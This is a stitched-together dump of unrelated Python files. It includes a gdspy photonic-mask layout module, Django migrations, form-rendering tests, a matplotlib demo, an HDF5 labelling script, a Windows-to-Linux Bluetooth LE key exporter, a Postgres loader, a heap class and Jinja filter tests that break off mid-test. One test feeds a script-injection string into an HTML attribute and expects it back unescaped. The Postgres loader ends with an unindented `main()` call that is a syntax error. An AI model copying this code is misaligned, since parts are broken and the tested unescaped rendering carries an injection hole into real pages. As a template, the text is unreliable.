    # create a cell reference for the cavity cell
    cavity_ref=gdspy.CellReference(cavity_cell,(0,0),rotation=90)
    # add the bounding rectangle to the cavity cell
    total=gdspy.Cell('total cell '+cell_name)
    total.add([cavity_ref,txtref])
    return total
def alignment_mark(xw,xl,layer):
    """Cross-shaped alignment mark: the union of two perpendicular rectangles.

    xw is the arm width and xl the overall arm length.
    """
    h_arm = gdspy.Rectangle((-xl / 2, -xw / 2), (xl / 2, xw / 2), **layer)
    v_arm = gdspy.Rectangle((-xw / 2, -xl / 2), (xw / 2, xl / 2), **layer)
    return gdspy.boolean(h_arm, v_arm, 'or', **layer)
def disc_resonator(radius,center,layer):
    """Circular disc resonator with the given radius, centred at `center`."""
    disc = gdspy.Round(center, radius, number_of_points=199, **layer)
    return disc
def ring_wg(wg_len,wg_width,radius,disc_loc,dist,layer):
    """Waveguide with a disc resonator placed beside it.

    disc_loc is the disc position measured from the left edge of the
    waveguide; dist is the edge-to-edge gap between disc and waveguide.
    Returns (waveguide geometry, disc geometry).
    """
    wg = waveguide(wg_width, wg_len, layer)
    # convert disc_loc (relative to the left edge) into the waveguide's
    # centred coordinate frame, and offset the disc centre by gap + radius
    disc_center = (wg_len / 2 - disc_loc, wg_width / 2 + dist + radius)
    disc = disc_resonator(radius, disc_center, layer)
    return wg, disc
def phc_mirror(numholes,radius,spacing,layer,offset,taper_depth=0.25,taper_holes=3):
    """
    Create a list of circles forming a photonic-crystal mirror.

    The first taper_holes holes ramp from radius*taper_depth up toward the
    full radius; the remaining (numholes - taper_holes) holes use the full
    radius. offset is an (x, y) shift applied to every hole.
    (Cleanup: removed the debug prints from the taper loop.)
    """
    holes = []
    dist = 0
    # unpack the offset vector
    x, y = offset
    # tapered section
    for i in range(taper_holes):
        rad = radius * taper_depth + (1 - taper_depth) * radius * i / taper_holes
        holes.append(gdspy.Round((dist + x, y), rad, number_of_points=199, **layer))
        dist += spacing
    # full-radius mirror holes
    for _ in range(taper_holes, numholes):
        holes.append(gdspy.Round((dist + x, y), radius, number_of_points=199, **layer))
        dist += spacing
    # TODO: add an input taper section
    return holes
def boxed_ring(wg_len,wg_width,radius,disc_loc,dist,ebeam_layer,
    opt_litho_layer,padding,clearance,supp_width,supp_len,tether_sp,tether_tri,
    min_taper_width,taper_len,coupling_sp,mirror_holes,mirror_rad,mirror_sp,
    name):
    """Disc resonator beside a waveguide, boxed for HSQ patterning.

    Like ring_wg, but also adds support tethers, an input taper, a photonic
    crystal mirror, a text label and the bounding box.
    Padding is the width of the bounding rectangle.
    Clearance is how much the PR pattern overlaps with the ebeam pattern.
    tether_tri refers to the length of the tapered part of the support tether.
    coupling_sp is the space left past the end of the taper tip.
    name is a list with parameters that identify the pattern.
    Returns (waveguide-with-mirror-cutout, disc, text rectangle, optical
    rectangle, support reference, tether references, taper reference,
    total length, rectangle shift).
    """
    # Calculate the total pattern width and length
    # add 5um of extra space on each side of the waveguide and disc
    w_tot=wg_width+2*radius+dist+10
    l_tot=wg_len+taper_len+coupling_sp+supp_len
    # Calculate how much to shift the rectangle relative to the center of the
    # pattern
    shift=(-(taper_len+coupling_sp)/2,0)
    # put all the relevant parameters in a dictionary
    rect_args={}
    rect_args['pattern_w']=2*w_tot
    rect_args['pattern_l']=l_tot
    rect_args['padding']=padding
    rect_args['layer']=ebeam_layer
    rect_args['rect_shift']=shift
    rect_args['clearance']=clearance
    rect_args['opt_litho_layer']=opt_litho_layer
    rect,length,opt_rect=bounding_rectangle(**rect_args)
    # create a text label for the pattern based on the spacing of the waveguide
    # and name of pattern
    # first cast the items in name into strings
    str_name=[str(i) for i in name]
    label=txt_label([str(dist)]+str_name)
    txt_rect_args={}
    txt_rect_args['bounding_box']=rect
    txt_rect_args['box_length']=l_tot
    txt_rect_args['box_width']=2*w_tot
    txt_rect_args['txt_label']=label
    txt_rect_args['layer']=ebeam_layer
    txt_rect_args['rect_shift']=shift
    txt_rect_args['txt_height']=1
    txt_rect=text_rect(**txt_rect_args)
    # create the disc and the waveguide
    disc_args={}
    disc_args['wg_len']=wg_len
    disc_args['wg_width']=wg_width
    disc_args['radius']=radius
    disc_args['disc_loc']=disc_loc
    disc_args['dist']=dist
    disc_args['layer']=ebeam_layer
    wg,disc=ring_wg(**disc_args)
    # now add support structures
    # support is a polygon
    # because support is a polygon, it needs to be converted to a cell to be
    # properly offset relative to the waveguide
    supp_args={}
    supp_args['wg_width']=wg_width
    supp_args['w']=supp_width
    supp_args['l']=supp_len
    supp_args['layer']=ebeam_layer
    supp=wg_support(**supp_args)
    supp_cell=gdspy.Cell('support structure'+' '+str(name))
    supp_cell.add(supp)
    supp_ref=gdspy.CellReference(supp_cell,(l_tot/2-supp_len-(taper_len+coupling_sp)/2,0))
    # now add tethers to support the waveguide
    tether_args={}
    # NOTE(review): tether width and wg_width below are hard-coded (0.1 / 1 /
    # 0.525 um) rather than derived from the function arguments - confirm
    # these are intentional process constants.
    tether_args['width']=0.1
    # length is full length of tether less the length of the triangular part
    tether_args['length']=w_tot-tether_tri
    # create a 1um wide tether
    tether_args['max_width']=1
    tether_args['taper_length']=tether_tri
    tether_args['wg_width']=0.525
    tether_args['layer']=ebeam_layer
    supp_tether=support_tether(**tether_args)
    # create a cell for the support tether
    tether_cell=gdspy.Cell('support tether'+' '+str(name))
    tether_cell.add(supp_tether)
    # want to repeat this geometry so add a list of cell references every
    # tether_sp apart
    # divide the waveguide length into a number of segments determined by
    # tether spacing
    # tether_list holds references to all the tethers
    tether_list=[]
    # `math` is assumed to be imported at the top of the file (not visible here)
    interval=math.floor(l_tot/tether_sp)
    for i in range(interval):
        loc=l_tot/2-taper_len/2-i*tether_sp
        # now check if the tether is going to run through the disc
        # determine the points around the disc
        # keep a 5um space around the disc
        disc_min=l_tot/2-disc_loc-radius-5
        disc_max=l_tot/2-disc_loc+radius+5
        # skip tethers that would intersect the disc or fall off the waveguide
        if not(((loc>disc_min) and (loc<disc_max)) or (loc<-wg_len/2) or (loc>wg_len/2)):
            tether_ref=gdspy.CellReference(tether_cell,(loc,0))
            tether_list.append(tether_ref)
    # now add tapered waveguide
    # returns an input taper
    taper_args={}
    taper_args['min_width']=min_taper_width
    taper_args['wg_width']=wg_width
    taper_args['l']=taper_len
    taper_args['layer']=ebeam_layer
    taper=input_taper(**taper_args)
    # need to create another cell reference to shift the taper to the end of the waveguide
    taper_cell=gdspy.Cell('taper'+' '+str(name))
    taper_cell.add(taper)
    taper_ref=gdspy.CellReference(taper_cell,(-wg_len/2,0))
    # add photonic crystal mirror
    mirror_args={}
    mirror_args['numholes']=mirror_holes
    mirror_args['radius']=mirror_rad
    mirror_args['spacing']=mirror_sp
    mirror_args['layer']=opt_litho_layer
    # define the offset of the mirror
    # need to estimate the length of the mirror
    # leave 1um of space between end of mirror from edge
    mirror_len=mirror_args['spacing']*mirror_args['numholes']
    mirror_args['offset']=(wg_len/2-mirror_len-1,0)
    mirror=phc_mirror(**mirror_args)
    # now subtract the mirror geometry from the waveguide
    wg_sub=gdspy.boolean(wg,mirror,'not')
    return wg_sub,disc,txt_rect,opt_rect,supp_ref,tether_list,taper_ref,l_tot,shift
def dicing_street(w,l,offset,layer,rect_width=90,alignment_sp=40):
    """Create a trench for DSE etching with alignment marks for the dicing
    saw.
    offset is an iterable holding the x and y offset.
    Returns (street rectangle, and four alignment rectangles - from their
    names presumably upper-left, lower-left, upper-right, lower-right).
    """
    x,y=offset
    # calculate the height of the alignment marks
    # NOTE(review): the 40 here appears tied to the default alignment_sp=40;
    # confirm whether it should track the parameter instead of being fixed
    h=(w-40)/2
    # the dicing street itself
    DSE=gdspy.Rectangle((-l/2+x,-w/2+y),(l/2+x,w/2+y),**layer)
    # alignment rectangles on each side of the street
    UL=gdspy.Rectangle((-l/2-rect_width+x-alignment_sp,alignment_sp/2+y),(-l/2-alignment_sp+x,alignment_sp/2+h+y),**layer)
    LL=gdspy.Rectangle((-l/2-rect_width+x-alignment_sp,-alignment_sp/2-h+y),(-l/2-alignment_sp+x,-alignment_sp/2+y),**layer)
    UR=gdspy.Rectangle((l/2+x+alignment_sp,alignment_sp/2+y),(l/2+x+alignment_sp+rect_width,alignment_sp/2+h+y),**layer)
    LR=gdspy.Rectangle((l/2+x+alignment_sp,-alignment_sp/2-h+y),(l/2+x+alignment_sp+rect_width,-alignment_sp/2+y),**layer)
    return DSE,UL,LL,UR,LR
# Generated by Django 3.0.2 on 2020-07-12 20:33
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add optional file_url and token CharField columns to collateralfiles."""

    dependencies = [
        ('loans', '0003_auto_20200617_0103'),
    ]
    operations = [
        # both columns are nullable so existing rows need no default
        migrations.AddField(
            model_name='collateralfiles',
            name='file_url',
            field=models.CharField(blank=True, max_length=300, null=True),
        ),
        migrations.AddField(
            model_name='collateralfiles',
            name='token',
            field=models.CharField(blank=True, max_length=300, null=True),
        ),
    ]
|
import proper_forms.fields as f
def test_render_attrs():
    """render_attrs: `classes` maps to class, underscores become dashes,
    True renders as a bare flag and False attributes are dropped."""
    field = f.Text()
    rendered = str(field.render_attrs(
        id="text1",
        classes="myclass",
        data_id=1,
        checked=True,
        ignore=False,
    ))
    assert rendered == 'class="myclass" data-id="1" id="text1" checked'
def test_render_attrs_empty():
    """Rendering with no attributes yields an empty string."""
    assert str(f.Text().render_attrs()) == ""
def test_render_attrs_bad():
    # NOTE(review): the expected output shows the quote and angle-bracket
    # characters are NOT escaped in the rendered attribute value - confirm
    # this is intentional upstream, since it looks XSS-prone if attribute
    # values can ever be user-supplied.
    field = f.Text()
    assert (
        str(field.render_attrs(myattr="a'b\"><script>bad();</script>"))
        == 'myattr="a\'b"><script>bad();</script>"'
    )
def test_object_value():
    """object_value is passed through `prepare` to produce values/value."""
    field = f.Text(prepare=lambda x: [str(x * 2)])
    field.object_value = 2
    assert field.value == "4"
    assert field.values == ["4"]
def test_input_values():
    """input_values are exposed directly as values/value."""
    field = f.Text()
    field.input_values = ["hello"]
    assert field.value == "hello"
    assert field.values == ["hello"]
def test_input_value_over_object_value():
    """When both are set, input_values take precedence over object_value."""
    field = f.Text()
    field.object_value = "bar"
    field.input_values = ["foo"]
    assert field.value == "foo"
    assert field.values == ["foo"]
def test_render_error():
    # a required field with no value will fail validation
    field = f.Text(required=True)
    # before validate() runs there is no error to render
    assert str(field.render_error()) == ""
    field.validate()
    error = "This field is required."
    # default wrapper tag is <div class="error">; both the tag name and the
    # CSS classes can be overridden
    assert str(field.render_error()) == f'<div class="error">{error}</div>'
    assert str(field.render_error("p")) == f'<p class="error">{error}</p>'
    assert (
        str(field.render_error(classes="errorMessage"))
        == f'<div class="errorMessage">{error}</div>'
    )
|
# Generated by Django 3.1.14 on 2022-02-02 07:12
from django.db import migrations
class Migration(migrations.Migration):
    """Remove the organization field from the snapshot model."""

    dependencies = [
        ('topology', '0013_add_user_defined_properties_field'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='snapshot',
            name='organization',
        ),
    ]
|
"""
==========
pcolormesh
==========
Shows how to combine Normalization and Colormap instances to draw
"levels" in pcolor, pcolormesh and imshow type plots in a similar
way to the levels keyword argument to contour/contourf.
"""
import matplotlib.pyplot as plt
from matplotlib.colors import BoundaryNorm
from matplotlib.ticker import MaxNLocator
import numpy as np
# make these smaller to increase the resolution
dx, dy = 0.05, 0.05
# generate 2 2d grids for the x & y bounds
y, x = np.mgrid[slice(1, 5 + dy, dy),
                slice(1, 5 + dx, dx)]
z = np.sin(x)**10 + np.cos(10 + y*x) * np.cos(x)
# x and y are bounds, so z should be the value *inside* those bounds.
# Therefore, remove the last value from the z array.
z = z[:-1, :-1]
# pick ~15 evenly spaced contour levels spanning the data range
levels = MaxNLocator(nbins=15).tick_values(z.min(), z.max())
# pick the desired colormap, sensible levels, and define a normalization
# instance which takes data values and translates those into levels.
cmap = plt.get_cmap('PiYG')
norm = BoundaryNorm(levels, ncolors=cmap.N, clip=True)
fig, (ax0, ax1) = plt.subplots(nrows=2)
# top axes: discrete-level pcolormesh using the BoundaryNorm
im = ax0.pcolormesh(x, y, z, cmap=cmap, norm=norm)
fig.colorbar(im, ax=ax0)
ax0.set_title('pcolormesh with levels')
# contours are *point* based plots, so convert our bound into point
# centers
cf = ax1.contourf(x[:-1, :-1] + dx/2.,
                  y[:-1, :-1] + dy/2., z, levels=levels,
                  cmap=cmap)
fig.colorbar(cf, ax=ax1)
ax1.set_title('contourf with levels')
# adjust spacing between subplots so `ax1` title and `ax0` tick labels
# don't overlap
fig.tight_layout()
plt.show()
|
#!/usr/bin/env python
"""
The data set that is in the specified hdf5 file has labels in two different locations.
The label input files have the .label suffix.
The foci input files have the .out suffix.
Vacuum up the labels from the two given directories, merge the relevant portions (image number,object number) and
convert from two-dimensional binary labeling into one multi class label, by the following scheme:
-1,-1 -> 0
1,-1 -> 1
-1,1 -> 2
1,1 -> 3
"""
import os
import sys
from optparse import OptionParser
from os import listdir, chdir, getcwd

import numpy as np
from tables import Atom
from tables import Filters
from tables.file import File, openFile, copyFile, hdf5Extension
# Check that options are present, else print help msg.
parser = OptionParser()
parser.add_option("--labelinput", dest="labels_indir", help="read shape labels from here")
parser.add_option("--fociinput", dest="foci_indir", help="read foci labels from here")
parser.add_option("-f", "--filename", dest="filename", help="specify the .h5 filename that will contain the data labels")
(options, args) = parser.parse_args()
# label conversion dictionary:
# maps the (foci label, shape label) pair of +/-1 values onto one class id,
# per the scheme in the module docstring: (-1,-1)->0 (1,-1)->1 (-1,1)->2 (1,1)->3
label_dict = {(-1.0,-1.0): 0, (1.0,-1.0): 1, (-1.0,1.0): 2, (1.0,1.0): 3}
def read_filenames(loc,suffix):
    """Return the names of files in directory `loc` that end with `suffix`.

    (The description previously lived in a stray module-level string above
    the function; it is now a proper docstring, and the filter loop is a
    comprehension.)
    """
    return [name for name in listdir(loc) if name.endswith(suffix)]
def read_array_from_file(filename,dirname):
    """Read columns 0-2 of the comma-separated file `filename` in `dirname`.

    BUGFIX: the old implementation chdir()'d into `dirname` and never changed
    back - a global side effect that broke any later call made with a
    relative directory path. The path is now joined instead, leaving the
    working directory untouched.
    """
    path = os.path.join(dirname, filename)
    return np.genfromtxt(path, delimiter=',', autostrip=True, usecols=(0,1,2))
def combine_arrays(foci_array,shape_array):
    """Merge foci and shape arrays into (class id, image no., object no.) rows.

    Column 0 of each input holds a +/-1 label; each (foci, shape) pair is
    translated to a single class id via the module-level label_dict, and the
    result is stacked with columns 1-2 of foci_array.
    """
    label_pairs = zip(foci_array[:, 0], shape_array[:, 0])
    class_ids = np.array([label_dict[pair] for pair in label_pairs])
    class_ids = class_ids.reshape(len(class_ids), 1)
    return np.hstack((class_ids, foci_array[:, (1, 2)]))
# Open and prepare an hdf5 file, adding a labels group
# (NOTE: this script is Python 2 - print statements and the legacy PyTables
# openFile/createGroup/createCArray API.)
filename = options.filename
h5file = openFile(filename, mode = "a", title = "Data File")
labels_group = h5file.createGroup("/", 'labels', 'The labels and object IDs')
zlib_filters = Filters(complib='zlib', complevel=5)
# Go to the files location in the filesystem.
shape_input = options.labels_indir
foci_input = options.foci_indir
cur_dir = getcwd()
try:
    foci_files = read_filenames(foci_input,'.out')
    shape_files = read_filenames(shape_input,'.label')
# NOTE(review): bare except hides the real error (bad path, permissions, or
# even a typo-induced NameError) - consider catching OSError only.
except:
    print "Could not read files from one of " + foci_input + ", " + shape_input
    sys.exit(1)
# pair the .out and .label files by sorted name order; this assumes matching
# filename prefixes in both directories - TODO confirm
foci_files.sort()
shape_files.sort()
# iterate over sorted & zipped files
for (f,s) in zip(foci_files,shape_files):
    # dataset name comes from the filename prefix (before the first '.')
    label_range = f.split('.')[0]
    foci_array = read_array_from_file(f,foci_input)
    shape_array = read_array_from_file(s,shape_input)
    relabeled_array = combine_arrays(foci_array,shape_array)
    # store as a compressed chunked array under /labels
    atom = Atom.from_dtype(relabeled_array.dtype)
    labels = h5file.createCArray(where=labels_group, name=label_range, atom=atom, shape=relabeled_array.shape, filters=zlib_filters)
    labels[:] = relabeled_array
    h5file.flush()
# Close the h5 file when done.
h5file.close()
|
# absolute import through the top-level package
from libs.operations import operator
print("mylib.py:", __name__)
# -- can do relative imports from file with parent package --
# rebinds the same name; only works when this module is imported as part of
# its package (a direct `python mylib.py` run would fail here)
from .operations import operator
|
class ZiggeoWebhooks:
    """Thin wrapper around the Ziggeo webhook REST endpoints."""

    def __init__(self, application):
        # the owning application exposes `.connect.post(path, data)`
        self.__application = application

    def _post(self, path, data):
        """POST `data` to the given API `path` via the owning application."""
        return self.__application.connect.post(path, data)

    def create(self, data = None):
        """Register a new webhook."""
        return self._post('/v1/api/hook', data)

    def confirm(self, data = None):
        """Confirm a previously registered webhook."""
        return self._post('/v1/api/confirmhook', data)

    def delete(self, data = None):
        """Remove a webhook."""
        return self._post('/v1/api/removehook', data)
|
#!/usr/bin/python3
"""
Export your Windows Bluetooth LE keys into Linux!
Thanks to: http://console.systems/2014/09/how-to-pair-low-energy-le-bluetooth.html
Usage:
$ ./export-ble-infos.py <args>
$ sudo bash -c 'cp -r ./bluetooth /var/lib && service bluetooth force-reload'
$ rm -r bluetooth
"""
import os
import shutil
import subprocess
import sys
import tempfile
from configparser import ConfigParser
from optparse import OptionParser
# Template for a BlueZ per-device `info` file. The empty Key=/EDiv=/Rand=
# fields are filled in by main() from the Windows registry dump; the rest
# (Name, Appearance, DeviceID, ConnectionParameters) are fixed defaults that
# can be overridden with --template.
default_template = """
[General]
Name=Designer Mouse
Appearance=0x03c2
AddressType=static
SupportedTechnologies=LE;
Trusted=true
Blocked=false
Services=00001800-0000-1000-8000-00805f9b34fb;00001801-0000-1000-8000-00805f9b34fb;0000180a-0000-1000-8000-00805f9b34fb;0000180f-0000-1000-8000-00805f9b34fb;00001812-0000-1000-8000-00805f9b34fb;
[IdentityResolvingKey]
Key=
[LocalSignatureKey]
Key=
Counter=0
Authenticated=false
[LongTermKey]
Key=
Authenticated=0
EncSize=16
EDiv=
Rand=
[DeviceID]
Source=2
Vendor=1118
Product=2053
Version=272
[ConnectionParameters]
MinInterval=6
MaxInterval=6
Latency=60
Timeout=300
"""
def main():
    """Export Windows BLE pairing keys into BlueZ `info` files.

    Dumps the BTHPORT registry key from a Windows SYSTEM hive via `reged`,
    parses the .reg output, and writes one BlueZ info file per
    adapter/device pair under the output directory.
    Returns a non-zero exit code if `reged` fails, otherwise None.
    """
    parser = OptionParser()
    parser.add_option("-v", "--verbose", action='store_true', dest='verbose')
    parser.add_option("-s", "--system", dest="system", metavar="FILE",
                      default="/media/mygod/Windows/Windows/System32/config/system",
                      help="SYSTEM file in Windows. Usually at /Windows/System32/config/system.")
    parser.add_option("-k", "--key", dest="key", metavar="KEY",
                      default=r"ControlSet001\Services\BTHPORT\Parameters\Keys",
                      help="Registry key for BT. [default: %default]")
    parser.add_option("-o", "--output", dest="output", metavar="DIR", default="bluetooth",
                      help="Output directory. [default: %default]")
    parser.add_option("-t", "--template", dest="template", metavar="FILE", help="Template file.")
    parser.add_option("-a", "--attributes", dest='attributes', help="Additional attributes file to be copied.")
    options, args = parser.parse_args()
    # the info-file skeleton: user-supplied file or the module-level default
    if options.template:
        with open(options.template) as file:
            template = file.read()
    else:
        template = default_template
    # dump the registry key to a temporary .reg file with chntpw's `reged`
    out = tempfile.mktemp(".reg")
    reged = subprocess.Popen(["reged", "-x", options.system, '\\', options.key, out], stdout=sys.stderr)
    reged.wait()
    if reged.returncode:
        return reged.returncode
    # the .reg format is close enough to INI for ConfigParser; drop the
    # "Windows Registry Editor ..." header line before parsing
    dump = ConfigParser()
    with open(out) as file:
        reged_out = file.read()
    if options.verbose:
        print(reged_out)
    dump.read_string(reged_out.split('\n', 1)[1])
    os.unlink(out)
    for section in dump:
        # section names look like <key>\<adapter-mac>\<device-mac>;
        # strip the key prefix and keep only fully-qualified device sections
        path = section[len(options.key) + 2:].split('\\')
        assert not path[0]
        if len(path) == 3:
            # reformat the raw hex MACs as colon-separated uppercase
            path[1] = ':'.join([path[1][i:i + 2] for i in range(0, len(path[1]), 2)]).upper()
            path[2] = ':'.join([path[2][i:i + 2] for i in range(0, len(path[2]), 2)]).upper()
            print("Dumping {}/{}...".format(path[1], path[2]))
            config = ConfigParser()
            # optionxform=str keeps BlueZ's case-sensitive option names intact
            config.optionxform = str
            config.read_string(template)

            def read_reg(key, expected_type):
                """Read a registry value from the current section and convert it.

                hex16 -> 32-char uppercase hex string; qword -> decimal string
                from a little-endian 8-byte value; dword -> decimal string.
                """
                def read_reg_actual(key, expected_type):
                    actual_type, content = dump[section]['"{}"'.format(key)].split(':', 1)
                    if expected_type == 'hex16':
                        assert actual_type == 'hex'
                        content = content.split(',')
                        assert len(content) == 16
                        return ''.join(content).upper()
                    if expected_type == 'qword':
                        assert actual_type == 'hex(b)'
                        content = content.split(',')
                        assert len(content) == 8
                        # bytes are stored little-endian; reverse before parsing
                        return str(int(''.join(content[::-1]), 16))
                    if expected_type == 'dword':
                        assert actual_type == expected_type
                        return str(int(content, 16))
                    assert False
                result = read_reg_actual(key, expected_type)
                if options.verbose:
                    print("{} of type {}: {}".format(key, expected_type, result))
                return result

            config['LongTermKey']['Key'] = read_reg('LTK', 'hex16')
            # KeyLength ignored for now
            config['LongTermKey']['Rand'] = read_reg('ERand', 'qword')
            config['LongTermKey']['EDiv'] = read_reg('EDIV', 'dword')
            config['IdentityResolvingKey']['Key'] = read_reg('IRK', 'hex16')
            config['LocalSignatureKey']['Key'] = read_reg('CSRK', 'hex16')
            # write bluetooth/<adapter-mac>/<device-mac>/info
            output_dir = os.path.join(options.output, path[1], path[2])
            os.makedirs(output_dir, exist_ok=True)
            with open(os.path.join(output_dir, 'info'), 'w') as file:
                config.write(file, False)
            if options.attributes:
                shutil.copyfile(options.attributes, os.path.join(output_dir, 'attributes'))
if __name__ == "__main__":
    # exit with main()'s return value (reged's exit status on failure, else 0)
    sys.exit(main())
|
#!/usr/bin/python3
"""sends a request to the URL
displays the value of the variable X-Request-Id in the response header"""
from sys import argv
from requests import get
if __name__ == "__main__":
    # first CLI argument is the URL to request
    url = argv[1]
    r = get(url)
    # prints the X-Request-Id response header, or None if the server omits it
    print(r.headers.get("X-Request-Id"))
|
import psycopg2 as pgres
import pandas as pd
# ___ Connect to ElephantSQL db _________
def conx_elephant(conx_str):
    """Open and return a psycopg2 connection for the given DSN string."""
    return pgres.connect(conx_str)
# _____ DROP table ____________
def drop_table(tbl_name, cur, conn):
    """Drop table `tbl_name` using cursor `cur` and commit on `conn`.

    `tbl_name` is interpolated directly into the SQL, so it must come from
    trusted code, never from user input.
    """
    cur.execute("DROP TABLE " + tbl_name)
    conn.commit()
# ---- CREATE a new table------------------
def create_table(tbl_name, fields_str, cur, conn):
    """Create table `tbl_name` with column spec `fields_str` and commit.

    Both strings are interpolated directly into the SQL, so they must come
    from trusted code, never from user input.
    """
    statement = "CREATE TABLE " + tbl_name + " " + fields_str + ';'
    cur.execute(statement)
    conn.commit()
def insert_titanic(pgres_cur):
    # Load the local titanic.csv and write it to a `titanic` table.
    # NOTE(review): despite the parameter name, main() passes the psycopg2
    # *connection* here, and pandas' DataFrame.to_sql only accepts SQLAlchemy
    # connectables or a sqlite3 connection - so this call likely fails
    # against raw psycopg2. Confirm and consider a SQLAlchemy engine.
    csv_url = "titanic.csv"
    df = pd.read_csv(csv_url)
    df.to_sql('titanic', if_exists='replace', con=pgres_cur, method='multi')
    return
def main():
    """Connect to ElephantSQL with credentials from elephant.pwd and port
    titanic.csv into a Postgres table.

    elephant.pwd holds one value per line, in order:
    dbname, user, host, password. Extra lines are ignored; missing lines
    leave the corresponding field empty (matching the old behaviour).
    """
    # read the four credential fields; `with` guarantees the file is closed
    # (the old code leaked the file handle)
    fields = ['', '', '', '']
    with open('elephant.pwd', 'r') as cred_file:
        for idx, line in enumerate(cred_file):
            if idx < 4:
                fields[idx] = line.replace('\n', '')
    dbname, user, host, passw = fields
    # build the libpq DSN string and connect
    pgres_str = ('dbname=' + dbname + ' user=' + user +
                 ' host=' + host + ' password=' + passw)
    pgres_conn = conx_elephant(pgres_str)
    # ____ create cursor ___
    pgres_cur = pgres_conn.cursor()
    # ____ Port titanic.csv to Postgres ___
    # (the connection, not the cursor, is what pandas' to_sql expects)
    insert_titanic(pgres_conn)
    # # _______ verify output _________
    # query = """
    # SELECT *
    # FROM public.titanic
    # LIMIT 10 ;
    # """
    # print('--- public.titanic table ---')
    # for row in pgres_cur.execute(query).fetchall():
    #     print(row)
    # ___ end main ___________
    pgres_cur.close()  # close cursor
    pgres_conn.close()  # close connection
    return
# Launched from the command line
if __name__ == '__main__':
main()
|
from heapq import heappush, heappop, heapify
# heappop - pop and return the smallest element from heap,
# maintaining the heap invariant.
# heappush - push the value item onto the heap,
# maintaining heap invarient.
# heapify - transform list into heap, in place,
# in linear time
class MinHeap:
    """Binary min-heap backed by the stdlib heapq functions.

    Cleanup: insertKey no longer prints the heap on every insert (debug
    noise); the rest of the interface is unchanged.
    """

    def __init__(self):
        # underlying list, kept in heap order by heapq
        self.heap = []

    def heapify(self, arr):
        """Heapify `arr` in place and adopt it as this heap's storage.

        Returns the (now heap-ordered) list.
        """
        heapify(arr)
        self.heap = arr
        return self.heap

    def parent(self, i):
        """Index of the parent of node `i` (the root is index 0)."""
        return (i - 1) // 2

    def insertKey(self, k):
        """Push `k` onto the heap, maintaining the heap invariant."""
        heappush(self.heap, k)

    def decreaseKey(self, i, new_val):
        """Overwrite heap[i] with `new_val` and sift it up toward the root.

        Precondition: new_val must be <= heap[i]; a larger value would not be
        sifted *down*, breaking the heap invariant below index i.
        """
        self.heap[i] = new_val
        while i != 0 and self.heap[self.parent(i)] > self.heap[i]:
            p = self.parent(i)
            self.heap[i], self.heap[p] = self.heap[p], self.heap[i]
            i = p

    def extractMin(self):
        """Pop and return the smallest element."""
        return heappop(self.heap)

    def deleteindex(self, i):
        """Delete the element at index `i` by sinking -inf there and popping."""
        self.decreaseKey(i, float("-inf"))
        self.extractMin()

    def getMin(self):
        """Return (without removing) the smallest element."""
        return self.heap[0]
# --- demo / smoke test of the MinHeap operations ---
heapObj = MinHeap()
heapObj.insertKey(3)
heapObj.insertKey(2)
heapObj.insertKey(15)
heapObj.insertKey(5)
heapObj.insertKey(4)
# remove whatever currently sits at index 3
heapObj.deleteindex(3)
heapObj.insertKey(45)
heapObj.insertKey(1)
# replace the heap contents with a freshly heapified list
heapObj.heapify([3,2,15,5,4,45,1])
print(heapObj.heap)
heapObj.insertKey(6)
print(heapObj.heap)
heapObj.deleteindex(3)
print(heapObj.heap)
|
import pytest
import jira_context
from jira_context import INPUT, JIRA
@pytest.fixture(autouse=True)
def reset_jira():
    """Reset jira_context module and JIRA class state before every test.

    Stubs the credential prompt so tests never block on real input, and
    restores every JIRA class attribute that individual tests may mutate.
    """
    # fake prompt: answers 'user' to the username (INPUT) prompt, 'pass' otherwise
    jira_context._prompt = lambda f, p: 'user' if f == INPUT else 'pass'
    JIRA.ABORTED_BY_USER = False
    JIRA.COOKIE_CACHE_FILE_PATH = None
    JIRA.FORCE_USER = None
    JIRA.MESSAGE_AUTH_ERROR = 'Error occurred, try again.'
    JIRA.MESSAGE_AUTH_FAILURE = 'Authentication failed or bad password, try again.'
    JIRA.PROMPT_PASS = 'JIRA password: '
    JIRA.PROMPT_USER = 'JIRA username: '
    JIRA.USER_CAN_ABORT = True
    JIRA.DEFAULT_OPTIONS['server'] = 'http://localhost/jira'
|
from datetime import datetime
from unittest import TestCase
from mock import Mock
from app.jinja_filters import format_date, format_currency, format_multilined_string, format_percentage
from app.jinja_filters import format_household_member_name
from app.jinja_filters import format_str_as_date
from app.jinja_filters import format_str_as_date_range
from app.jinja_filters import format_str_as_month_year_date
class TestJinjaFilters(TestCase):
    """Unit tests for the app's Jinja template filters.

    Covers currency, multi-line string, date, household-member-name and
    percentage formatting.
    """

    def test_format_currency(self):
        # Given
        currency = 1.12
        # When
        format_value = format_currency(currency)
        self.assertEqual(format_value, '£1.12')

    # format_multilined_string should convert \r, \n and \r\n to <br>,
    # wrapping the result in <p> tags
    def test_format_multilined_string_matches_carriage_return(self):
        # Given
        new_line = 'this is on a new\rline'
        context = Mock()
        context.autoescape = False
        # When
        format_value = format_multilined_string(context, new_line)
        self.assertEqual(format_value, '<p>this is on a new<br>line</p>')

    def test_format_multilined_string_matches_new_line(self):
        # Given
        new_line = 'this is on a new\nline'
        context = Mock()
        context.autoescape = False
        # When
        format_value = format_multilined_string(context, new_line)
        self.assertEqual(format_value, '<p>this is on a new<br>line</p>')

    def test_format_multilined_string_matches_carriage_return_new_line(self):
        # Given
        new_line = 'this is on a new\r\nline'
        context = Mock()
        context.autoescape = False
        # When
        format_value = format_multilined_string(context, new_line)
        self.assertEqual(format_value, '<p>this is on a new<br>line</p>')

    def test_format_multilined_string(self):
        # Given
        new_line = 'this is\ron a\nnew\r\nline'
        context = Mock()
        context.autoescape = False
        # When
        format_value = format_multilined_string(context, new_line)
        self.assertEqual(format_value, '<p>this is<br>on a<br>new<br>line</p>')

    def test_format_multilined_string_auto_escape(self):
        # Given
        new_line = '<'
        context = Mock()
        context.autoescape = True
        # When: with autoescape on, the '<' is HTML-escaped
        format_value = format_multilined_string(context, new_line)
        self.assertEqual(str(format_value), '<p>&lt;</p>')

    def test_format_date(self):
        # Given
        date = datetime.strptime('01/01/17', '%d/%m/%y')
        # When
        format_value = format_date(date)
        self.assertEqual(format_value, '1 January 2017')

    def test_format_str_as_date_range(self):
        # Given
        date_range = {'from': '01/01/2017',
                      'to': '01/01/2018'}
        # When
        format_value = format_str_as_date_range(date_range)
        self.assertEqual(format_value, '01 January 2017 to 01 January 2018')

    def test_format_str_as_month_year_date(self):
        # Given
        month_year_date = '3/2018'
        # When
